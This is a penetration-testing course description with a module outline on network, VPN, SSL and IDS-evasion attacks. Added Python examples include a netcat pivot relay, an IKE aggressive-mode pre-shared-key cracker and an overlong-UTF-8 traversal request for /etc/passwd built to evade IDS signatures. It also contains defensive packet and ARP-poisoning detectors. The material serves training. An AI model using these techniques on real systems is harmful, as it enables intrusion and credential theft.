Certified Penetration Testing Consultant

Key Data
Certified Penetration Testing Consultant Course Description

Course Name: C)PTC (V3)

Duration: 4 days

Language: English

Format:
• Instructor-led classroom (Lecture and Labs)

Prerequisites:
• C)PTE, GIAC, or equivalent knowledge

• A minimum of 24 months experience in Networking Technologies
• Sound knowledge of TCP/IP
• Computer hardware knowledge
• Experience as a Support Professional or Consultant

Student Materials:
• Student Workbook
• Student Reference Manual
• Software/Tools 2x DVDs & Definitions Book


Certification Exam:
• C)PTC – Practical Exam

Certification Track:
• C)PTE – Certified Pen Testing Engineer™
• C)PTC - Certified Pen Testing Consultant™
• C)SWAE – Certified Secure Web Application Engineer

 

The Certified Penetration Testing Consultant course is designed for cyber security professionals and IT network administrators who want to conduct penetration tests against large network infrastructures of the kind run by large corporations, service providers and telecommunications companies. Instead of focusing on operating-system-level penetration testing, this course covers how to attack, and how to defend, the underlying network infrastructure and protocols.

The training starts with basic packet capture and analysis using common tools, then moves on to Layer 2 attack vectors; Layer 3 attacks against both the IPv4 and IPv6 stacks, including routing protocol attacks (OSPF, BGP, etc.); service-provider-level attacks against the widely deployed MPLS; relays and pivots; VPN attacks including the IPsec protocol suite; SSL attacks; and finally NIDS/NIPS evasion and implementation techniques.

At the end of each module, students practise what they have learned in lab exercises prepared specifically for the material covered in the theory section.

UPON COMPLETION

A Certified Penetration Testing Consultant is a cyber security professional with the ability to plan, manage and perform a penetration test. The designation “Consultant” is related to the depth and breadth of understanding required to manage a project involving multiple team members, manage the client’s expectations and deliver an audit of security controls that is thorough, well documented and ethically sound.


COURSE DETAILS

Module 0:  C)PTC Intro
Module 1:  Packet Capturing
Module 2:  Layer 2 Attacks
Module 3:  Layer 3 Attacks on Cisco Based Infrastructures & Enumeration
Module 4:  Pivoting and Relays
Module 5:  IPv6 Attacks
Module 6:  VPN Attacks
Module 7:  Defeating SSL
Module 8:  IDS/IPS Evasion


LABORATORY EXERCISES


Lab 1:  Working with Captured Files
Lab 2:  Layer 2 Attacks
Lab 3:  Attacking Routing Protocols
Lab 4:  Using Pivot Machines
Lab 5:  IPv6 Attacks
Lab 6:  VPN Attacks
Lab 7:  Defeating SSL – Decrypting Traffic and Man-in-the-Middle Attacks
Lab 8:  NIDS/NIPS


OBJECTIVE OF HANDS-ON LABORATORY SCENARIOS

This is an intensive hands-on class. Students may spend 20 hours or more performing labs that walk them through a real-world pen testing model. Labs begin with simple activities and move on to more complex procedures. During labs, students work through a detailed Lab Guide containing screenshots, the commands to be typed and the steps to take. Students use scores of traditional and cutting-edge pen testing tools (GUI and command line, Windows and Linux) as they work through mile2's time-tested methodology (see the outline below for tool names). As new methods arise in the security world, our labs are updated to reflect them.

 
CERTIFIED PENETRATION TESTING CONSULTANT EXAM

The Certified Penetration Testing Consultant exam is a 6-hour practical in which you conduct both a vulnerability assessment and a full penetration test against two IP addresses. You are then given 60 days to submit a written penetration test report, which is analyzed by our team of experts. You are required to find at least 80% of the vulnerabilities and to manually verify that each finding is legitimate rather than a scanner false positive. The report must be professionally written, grammatically correct and accurate. The exam is pass/fail.





Module 1: Packet Capturing

Packet Capturing

Packet capturing using libpcap

Capturing using ncap

Packet Capturing Software

Windump / TCPDump

Usage

Windump & PS

Wireshark

General Settings

Preferences

Capture Settings

Interface Options

Column Settings

Name Resolution Settings

Panes

Capture Options

Menu Shortcuts

Follow TCP Stream

Expert Infos

Packet Reassembly

Capturing VOIP Calls

VOIP Call Filtering

Call Setup

Playing the call

Saving the call into a file

SMB Export

HTTP Export
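Added worked example (not part of mile2's course material): a minimal reader for the classic libpcap file format that decodes Ethernet, 802.1Q, IPv4 and TCP headers and pulls out bare SYNs, the kind of triage the "Working with Captured Files" lab does with tcpdump and Wireshark. The capture file is constructed inline from two sample frames; every MAC and IP address in it is made up, and pcapng and nanosecond-timestamp captures are deliberately rejected rather than misparsed.

```python
"""Minimal pcap reader: decodes Ethernet / 802.1Q / IPv4 / TCP from a classic libpcap file."""
import socket
import struct
from typing import Dict, List

PCAP_MAGIC_LE = 0xA1B2C3D4      # writer's byte order matches ours (microsecond timestamps)
PCAP_MAGIC_BE = 0xD4C3B2A1      # same magic seen through the opposite byte order
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4, ETHERTYPE_VLAN = 0x0800, 0x8100
TCP_FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG"]


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum over the IPv4 header (0 when the header verifies)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp_syn(src_ip: str, dst_ip: str, sport: int, dport: int, vlan: int = None) -> bytes:
    """Constructed sample frame (not captured traffic): Ethernet [+ 802.1Q] / IPv4 / TCP SYN."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb")   # made-up MACs
    if vlan is not None:
        eth += struct.pack("!HH", ETHERTYPE_VLAN, vlan & 0x0FFF)
    eth += struct.pack("!H", ETHERTYPE_IPV4)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    return eth + ip + tcp


def build_pcap(frames: List[bytes]) -> bytes:
    """Wrap raw frames in a little-endian libpcap 2.4 file (global header + per-record headers)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def decode_frame(frame: bytes) -> Dict:
    """Decode one Ethernet frame down to the TCP header; other ethertypes/protocols stop early."""
    rec: Dict = {"vlan": None}
    ethertype, = struct.unpack("!H", frame[12:14])
    off = 14
    if ethertype == ETHERTYPE_VLAN:                      # one 802.1Q tag: TCI + inner ethertype
        tci, ethertype = struct.unpack("!HH", frame[14:18])
        rec["vlan"], off = tci & 0x0FFF, 18
    rec["ethertype"] = ethertype
    if ethertype != ETHERTYPE_IPV4:
        return rec
    ihl = (frame[off] & 0x0F) * 4
    ip_hdr = frame[off:off + ihl]
    rec.update(src=socket.inet_ntoa(ip_hdr[12:16]), dst=socket.inet_ntoa(ip_hdr[16:20]),
               proto=ip_hdr[9], ip_checksum_ok=ipv4_checksum(ip_hdr) == 0)
    if rec["proto"] == 6:
        tcp = frame[off + ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        flags = tcp[13]
        rec.update(sport=sport, dport=dport,
                   flags=[name for bit, name in enumerate(TCP_FLAG_NAMES) if flags & (1 << bit)])
    return rec


def parse_pcap(data: bytes) -> List[Dict]:
    """Walk the record headers; the magic tells us which byte order the writer used."""
    magic, = struct.unpack("<I", data[:4])
    endian = {PCAP_MAGIC_LE: "<", PCAP_MAGIC_BE: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng / nanosecond variants not handled)")
    *_, linktype = struct.unpack(endian + "HHiIII", data[4:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only LINKTYPE_ETHERNET captures are decoded here")
    records, off = [], 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        rec = decode_frame(data[off:off + incl_len])
        rec["ts"] = ts_sec + ts_usec / 1e6
        records.append(rec)
        off += incl_len
    return records


def syn_scan_targets(records: List[Dict]) -> Dict[str, set]:
    """Equivalent of the tcpdump filter 'tcp[tcpflags] == tcp-syn': ports probed per destination."""
    hits: Dict[str, set] = {}
    for r in records:
        if r.get("proto") == 6 and r.get("flags") == ["SYN"]:
            hits.setdefault(r["dst"], set()).add(r["dport"])
    return hits


if __name__ == "__main__":
    sample = build_pcap([build_tcp_syn("10.0.0.5", "10.0.0.80", 40001, 80),
                         build_tcp_syn("10.0.0.5", "10.0.0.80", 40002, 443, vlan=10)])
    for r in parse_pcap(sample):
        print(r)
```

The reader verifies the IPv4 header checksum for each packet; a capture full of bad checksums usually means the frames were taken before offload fixed them up (tx side) rather than that anything was tampered with, which is worth knowing before reporting it as a finding.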


Module 2: Layer2 Attacks

Why Layer2?

FBI/CSI Risk Assessment

Ethernet Frame Formats

Different Types of attacks

Switch Learning Process

Excessive Flooding

Macof

Cisco Switches’ Bridging Table Capacities

Mac Flooding Alternative: Mac Spoofing Attacks

Spanning Tree Basics

Frame Formats

Dissecting

Main BPDU Formats

yersinia

STP Attacks supported in yersinia

Becoming Root Bridge

VLANs

Basic Trunk Port Defined

Dynamic Trunking Protocol (Cisco)

VLAN Hopping Attack

Double Tagging

How DHCP Operates

DHCP Request/Reply Types

DHCP Fields

DHCP Starvation Attack

Rogue DHCP Server Attack

ARP Function Review

Risk Analysis of ARP

ARP Spoofing Attack Tools

ARP Cache Poisoning

How PoE Works

Risk Analysis for PoE
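Added example, not from the course workbook: an arpwatch-style detector for the ARP cache poisoning listed above. It builds Ethernet/ARP frames for a constructed scenario (a legitimate request/reply for the gateway, then an arpspoof-style reply from a different MAC claiming the gateway's IP) and flags unsolicited replies and changed IP-to-MAC bindings. All addresses are made up, and the detector keeps no state beyond what a span-port sensor would see.

```python
"""ARP cache-poisoning detector over constructed frames (arpwatch-style bookkeeping)."""
import socket
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ARP_FMT = "!HHBBH6s4s6s4s"          # htype, ptype, hlen, plen, op, sha, spa, tha, tpa


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def build_arp(op: int, sha: str, spa: str, tha: str, tpa: str, eth_src: str = None) -> bytes:
    """Ethernet/ARP frame. eth_src lets the frame's source MAC differ from the ARP sender MAC."""
    eth_dst = mac(tha) if op == ARP_REPLY else mac("ff:ff:ff:ff:ff:ff")
    eth = eth_dst + mac(eth_src or sha) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, op, mac(sha), socket.inet_aton(spa),
                      mac(tha), socket.inet_aton(tpa))
    return eth + arp


def parse_arp(frame: bytes) -> Optional[Dict]:
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return dict(op=op, sha=mac_str(sha), spa=socket.inet_ntoa(spa), tha=mac_str(tha),
                tpa=socket.inet_ntoa(tpa), eth_src=mac_str(frame[6:12]))


class ArpWatch:
    """Learns IP->MAC from replies and alerts on the two classic poisoning tells."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}         # ip -> mac learned from replies
        self.pending: set = set()               # (requester_ip, wanted_ip) seen in requests
        self.alerts: List[str] = []

    def feed(self, frame: bytes) -> None:
        a = parse_arp(frame)
        if a is None:
            return
        if a["op"] == ARP_REQUEST:
            self.pending.add((a["spa"], a["tpa"]))
            return
        # Reply: sender MAC inside ARP should match the frame's source MAC.
        if a["sha"] != a["eth_src"]:
            self.alerts.append(f"{a['spa']}: ARP sender {a['sha']} != Ethernet source {a['eth_src']}")
        # Reply nobody asked for (gratuitous) is how most poisoning tools push their mapping.
        if (a["tpa"], a["spa"]) in self.pending:
            self.pending.discard((a["tpa"], a["spa"]))
        else:
            self.alerts.append(f"{a['spa']}: unsolicited reply claiming {a['sha']}")
        known = self.table.get(a["spa"])
        if known is not None and known != a["sha"]:
            self.alerts.append(f"{a['spa']}: changed from {known} to {a['sha']} (possible poisoning)")
        self.table[a["spa"]] = a["sha"]


def demo() -> List[str]:
    """Constructed scenario: normal request/reply, then an attacker claims the gateway's IP."""
    gw, gw_mac = "192.168.1.1", "00:11:22:33:44:01"
    victim, victim_mac = "192.168.1.10", "00:11:22:33:44:0a"
    attacker_mac = "cc:cc:cc:cc:cc:cc"
    w = ArpWatch()
    w.feed(build_arp(ARP_REQUEST, victim_mac, victim, "00:00:00:00:00:00", gw))
    w.feed(build_arp(ARP_REPLY, gw_mac, gw, victim_mac, victim))
    w.feed(build_arp(ARP_REPLY, attacker_mac, gw, victim_mac, victim))   # arpspoof-style poison
    return w.alerts


if __name__ == "__main__":
    print("\n".join(demo()))
```

The same bookkeeping is what Dynamic ARP Inspection does on the switch, except that the switch checks replies against the DHCP snooping binding table instead of against what it has seen on the wire, so it is not fooled by an attacker who poisons before the sensor has learned the real binding.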

 

 

 

Module 3: Layer3 Attacks on Cisco Based Infrastructures

Layer 3 protocols

Protocols: BGP

BGP MD5 Cracking

BGP Route Injection

MP-BGP Route Injection

Protocols: OSPF

Protocols: ISIS

Protocols: HSRP/VRRP

DDoS detection

DDoS prevention

Ingress/egress filtering

Worm detection and protection

DDoS/worm research/future

MPLS

Bi-directional MPLS-VPN traffic redirection

Some More MPLS Attacks

Router integrity checking

 

 


Module 4: Pivoting and Relays

Pivoting

Netcat

Backdoors with nc

Netcat – Basic Usage

Persistent Listeners

Shovel a shell

Shovel a file

netcat port scanner

Relays

Simple Netcat Relay

Two-Way Netcat Relay – The Newbie Approach

Named Pipes

I/O Streams and Redirection

Relay Scenario 1

Two-Way NC Relay with Named Pipe

Relay Scenario 2

Relay Scenario 3
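Added example in Python, not the course's own lab: a two-way TCP relay that does what the netcat named-pipe relay covered above does (`mknod backpipe p; nc -l -p 8080 0<backpipe | nc target 80 1>backpipe`), plus a local echo server standing in for the internal host so the whole thing runs offline. The hosts and ports are for the local demo only. One caveat for the nc one-liner itself: traditional netcat wants `-l -p PORT`, while the OpenBSD variant takes `-l PORT` and treats `-p` as a source port.

```python
"""Two-way TCP relay (pivot) in pure Python, equivalent to the netcat named-pipe relay."""
import socket
import threading
from typing import Callable, Tuple

# Reference shell version from the module (not executed here):
#   mknod backpipe p
#   nc -l -p 8080 0<backpipe | nc 10.0.0.2 80 1>backpipe
# The pipe "|" carries client -> target; the named pipe carries target -> client back.


def pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until EOF, then tear down both ends so the opposite pump exits too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            s.close()


def serve(handler: Callable[[socket.socket], None], host: str = "127.0.0.1") -> Tuple[socket.socket, int]:
    """Listen on an ephemeral port; one thread per accepted connection. Returns (listener, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)

    def accept_loop() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:              # listener closed
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_relay(target_host: str, target_port: int, listen_host: str = "127.0.0.1"):
    """Pivot: whatever connects to the returned port is patched through to target_host:target_port."""
    def handle(client: socket.socket) -> None:
        try:
            target = socket.create_connection((target_host, target_port))
        except OSError:
            client.close()
            return
        threading.Thread(target=pump, args=(client, target), daemon=True).start()   # forward
        threading.Thread(target=pump, args=(target, client), daemon=True).start()   # reverse
    return serve(handle, listen_host)


def start_echo_server():
    """Constructed stand-in for the internal host behind the pivot."""
    def handle(conn: socket.socket) -> None:
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    return
                conn.sendall(data)
    return serve(handle)


def relay_roundtrip(payload: bytes = b"GET / HTTP/1.0\r\n\r\n") -> bytes:
    """Send payload client -> relay -> echo server and return what comes back through the relay."""
    echo_srv, echo_port = start_echo_server()
    relay_srv, relay_port = start_relay("127.0.0.1", echo_port)
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(payload)
            got = b""
            while len(got) < len(payload):
                chunk = c.recv(4096)
                if not chunk:
                    break
                got += chunk
        return got
    finally:
        relay_srv.close()
        echo_srv.close()


if __name__ == "__main__":
    print(relay_roundtrip())
```

Because each direction has its own thread and the teardown closes both sockets, a half-closed connection on either side ends the session cleanly instead of leaving a stuck nc waiting on the pipe, which is the usual failure of the newbie two-process relay.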

 

Module 5: IPv6 Attacks

IPv4

IPv6

IPv4 & IPv6 Headers

IPv6 Header Format

End-to-End Principle

Differences with End-to-End

End point filters

Merging IPSEC and Firewall functions

Scanning

ICMPv6

ICMPv6 Neighbor Discovery

IPv6 Attack Tools

DAD (Duplicate Address Detection) DoS Attack

Auto-Configuration Mechanisms

Autoconfiguration – SLAAC, DHCPv6

Auto-Configuration IPv4 & IPv6

ICMPv6 Types

Neighbor Discovery

ND spoofing

http://www.thc.org/thc-ipv6

dos-new-ip6 (THC)

parasite6 (THC)

redir6 (THC)

fake_router6 (THC)

IPv6 in Today’s Network

Extension Headers

Routing Header

Different Types of Routing Header

RH0 (Deprecated by RFC 5095) Format

Routing Header 0 Attack

Layer 3-4 Spoofing

Transition Mechanism Threats

IPv6 Firewalls

Making existing tools work

Summary

 

 


Module 6: VPN Attacks

VPNs

VPN Comparison

IPSec

Detecting IPSec VPNs

AH versus ESP

Tunnel mode versus Transport mode

Main mode versus aggressive mode

IKE Main Mode

IKE Aggressive Mode

IPv4 Header

Authentication Header

AH Transport Mode

AH Tunnel Mode

Authentication Algorithms

AH and NAT

ESP with Authentication

ESP in Transport Mode

ESP in Tunnel Mode

IKE

ike-scan

Aggressive Mode

Main Mode

Aggressive Mode ID

Aggressive Mode PSK Attacks

Aggressive PSK Cracking

Aggressive Mode ID Enumeration

Main Mode PSK Attacks

Main Mode PSK Cracking

Main Mode Policy Enumeration

IKECrack

IKEProbe

Other VPN Flaws

Insecure Storage of Credentials on VPN Clients

Username Enumeration
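Added example, not from the course material: why the "Aggressive Mode PSK Attacks" above work. In IKEv1 aggressive mode the responder's HASH_R is sent in the clear in the second message, and every other input to it (both DH public values, both cookies, the initiator's SA payload, IDir and both nonces) is visible on the wire, so a single captured exchange can be attacked offline with a wordlist, which is what ike-scan's psk-crack does. The capture below is constructed: field values are derived deterministically from a seed and HASH_R is computed from the PSK "letmein" to stand in for a real capture. The derivation follows RFC 2409 with HMAC-SHA1 as the prf.

```python
"""IKEv1 aggressive-mode PSK dictionary attack (RFC 2409 derivation) on a constructed capture."""
import hashlib
import hmac
from dataclasses import dataclass, replace
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Everything a passive observer sees in the three-message aggressive exchange."""
    g_xi: bytes     # initiator DH public value (message 1)
    g_xr: bytes     # responder DH public value (message 2)
    cky_i: bytes    # initiator cookie (ISAKMP header)
    cky_r: bytes    # responder cookie
    sai_b: bytes    # body of the initiator's SA payload
    idir_b: bytes   # body of the responder's ID payload (message 2, unencrypted)
    ni_b: bytes     # initiator nonce
    nr_b: bytes     # responder nonce
    hash_r: bytes   # HASH_R payload from message 2, also unencrypted


def prf(key: bytes, data: bytes, hash_name: str = "sha1") -> bytes:
    """RFC 2409 prf: HMAC keyed with the negotiated hash algorithm."""
    return hmac.new(key, data, hash_name).digest()


def hash_r_for_psk(psk: bytes, cap: AggressiveModeCapture, hash_name: str = "sha1") -> bytes:
    # SKEYID = prf(pre-shared-key, Ni_b | Nr_b)            (RFC 2409 section 5.4)
    skeyid = prf(psk, cap.ni_b + cap.nr_b, hash_name)
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    return prf(skeyid, cap.g_xr + cap.g_xi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b,
               hash_name)


def crack_psk(cap: AggressiveModeCapture, wordlist: Iterable[str],
              hash_name: str = "sha1") -> Optional[str]:
    """Offline attack: every HASH_R input except the PSK is public, so a guess costs two HMACs."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r_for_psk(candidate.encode(), cap, hash_name), cap.hash_r):
            return candidate
    return None


def make_capture(psk: str, seed: bytes = b"ike-demo") -> AggressiveModeCapture:
    """Constructed capture: deterministic pseudo-random fields, HASH_R computed with psk."""
    def field(label: str, n: int) -> bytes:
        out = b""
        while len(out) < n:                       # stretch sha256 output to the field size
            out += hashlib.sha256(seed + label.encode() + bytes([len(out)])).digest()
        return out[:n]

    cap = AggressiveModeCapture(
        g_xi=field("g_xi", 128), g_xr=field("g_xr", 128),        # 1024-bit DH group values
        cky_i=field("cky_i", 8), cky_r=field("cky_r", 8),
        sai_b=field("sai_b", 52),
        idir_b=b"\x01\x00\x00\x00" + bytes([192, 168, 1, 1]),    # ID_IPV4_ADDR 192.168.1.1
        ni_b=field("ni", 20), nr_b=field("nr", 20), hash_r=b"")
    return replace(cap, hash_r=hash_r_for_psk(psk.encode(), cap))


if __name__ == "__main__":
    capture = make_capture("letmein")
    print(crack_psk(capture, ["password", "cisco123", "letmein", "admin"]))
```

In main mode the same HASH_R arrives in message 6 encrypted under SKEYID_e, so a passive capture is not enough and the main-mode attacks in this module need an active position (impersonating the responder) to get material to test guesses against. The fix on the defender's side is not a longer PSK but turning off aggressive mode, or moving to certificates or IKEv2.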

 


Module 7: Defeating SSL

Outline

How SSL Works

Certificate Types

Certificate Chaining

Chain of trust

Verifying a Certificate Chain

Certificate Chain That Cannot be Verified

What if…

Basic Constraints

Then the story started

SSLSNIFF

Running SSLSNIFF

Setting up IPTABLES

Running arpspoof

SSLSTRIP

How an SSL Connection Is Initiated

SSLSTRIP

What Does It Look Like?

With SSLSTRIP

Running SSLSTRIP

Combining this technique with homograph attack

Certificates

Certificate Enrollment Request PKCS#10

Certificate (Subjects)

CN Encoding

PKCS #10 SUBJECT

PKCS #10 Certificate Signing Request

Disadvantages

Universal Wildcard

More Weird Stuff

What do we have to worry about?

Certificate Revocation

Defeating OCSP

OCSP-Aware SSLSNIFF

Updates

Update-Aware SSLSNIFF

Snort

What is Snort?

Snort Architecture

Packet Sniffing

Preprocessors

Detection Engine

Alerting Components

Three major modes

Using Snort as Packet Sniffer

Packet Sniffing

Snort as Packet Logger

Snort as NIDS

Snort Rule Tree

Decoding Ethernet Packet

Preprocessor Layout

Parts of a Rule

Outputs


Module 8: IDS/IPS Evasion

Evasion

Networking Standards

Evasion Principles

Evasion Layers

Layer 2

Layer 3-4

Fragmentation

Fragmentation Attacks – Ping of Death

More Malicious Fragments

Fragmentation-Based Techniques

Sending Overlapping Fragments

Different Reassembly Timeout

Sending Fragment with Different TTLs

Insertion Attacks

Protocol Violation

Layer 5-7

SMB Evasions

SMB based vulnerabilities

How can IDS control SMB sessions?

DCERPC Evasions

How DCERPC Works

DCERPC Bind Evasions

DCERPC Call Evasions

DCERPC Transport Evasions

Obfuscation

Client Side Attack Evasions

Unicode

UTF-8 Overlong Strings

Javascript Evasions

Base64 your HTML

Encryption

DoS Attacks

Failure Points

Alert Management

Hardware Limitations

Session Tracking

Pattern Matching

Signature Matching
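Added example, not from the course material, for the "UTF-8 Overlong Strings" and "Signature Matching" items above: a request that percent-encodes an overlong UTF-8 form of "." (0xC0 0xAE) slips past a byte-pattern signature for "../" while a lenient decoder on the target still turns it into a traversal. The block shows the lenient decoder (to mirror the target), the naive byte-match IDS, and a normalizing IDS that treats any overlong sequence as a protocol violation the way Snort's HTTP preprocessor does. The request lines are constructed.

```python
"""Overlong UTF-8 as an IDS evasion: a byte-level signature misses what a lenient decoder yields."""
from typing import List, Optional
from urllib.parse import unquote_to_bytes

TRAVERSAL_SIG = b"../"

# Constructed request lines (not real traffic).
PLAIN = b"GET /cgi-bin/../../etc/passwd HTTP/1.0"
EVASIVE = b"GET /cgi-bin/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0"   # %c0%ae = overlong "."


def lenient_utf8_decode(data: bytes) -> str:
    """A decoder that accepts overlong forms, as some historic servers did. Models the target."""
    out: List[str] = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # Two-byte form with no check that the value actually needed two bytes.
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        elif 0xE0 <= b <= 0xEF and i + 2 < len(data) and all(0x80 <= c <= 0xBF for c in data[i + 1:i + 3]):
            out.append(chr(((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)))
            i += 3
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def strict_decode_ok(data: bytes) -> bool:
    """Python's codec follows RFC 3629 and rejects overlong sequences outright."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def find_overlong(data: bytes) -> List[int]:
    """Offsets of overlong lead bytes: C0/C1 always; E0 with 2nd byte < A0; F0 with 2nd byte < 90."""
    hits = []
    for i, b in enumerate(data):
        nxt = data[i + 1] if i + 1 < len(data) else 0xFF
        if b in (0xC0, 0xC1) or (b == 0xE0 and nxt < 0xA0) or (b == 0xF0 and nxt < 0x90):
            hits.append(i)
    return hits


def naive_ids(request_line: bytes) -> bool:
    """Percent-decode, then look for the raw signature bytes. Blind to overlong encodings."""
    return TRAVERSAL_SIG in unquote_to_bytes(request_line)


def normalizing_ids(request_line: bytes) -> Optional[str]:
    """Flag overlong UTF-8 as a violation first, then match on what the target would decode."""
    raw = unquote_to_bytes(request_line)
    if find_overlong(raw):
        return "overlong UTF-8 (evasion attempt)"
    if TRAVERSAL_SIG.decode() in lenient_utf8_decode(raw):
        return "directory traversal"
    return None


if __name__ == "__main__":
    for line in (PLAIN, EVASIVE):
        print(line, naive_ids(line), normalizing_ids(line))
```

The point generalises past "../": any signature matched on bytes before the sensor has normalised the stream the same way the target will can be dodged with an alternate encoding, which is why the evasion items in this module are paired with the preprocessor material under Snort.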


 


 

 

Also available as:

LIVE REMOTE TRAINING

Attend live class from anywhere in the world!

• Live presentations with powerful functionality that delivers easy viewing of slides and other documents, shared Internet access, a virtual whiteboard and a media center, all through an easy-to-use toolbar.

• Application, file and desktop sharing let you view live demonstrations.

• A dedicated high-spec remote PC per student, with full access as if you were sitting in front of the PC in the classroom.

• The instructor views each student's session during the hands-on labs and can access your remote system to demonstrate and assist, while you sit back and absorb the classroom-style mentoring you expect.

• Public and private text chat allows for increased interactivity between students and instructor.

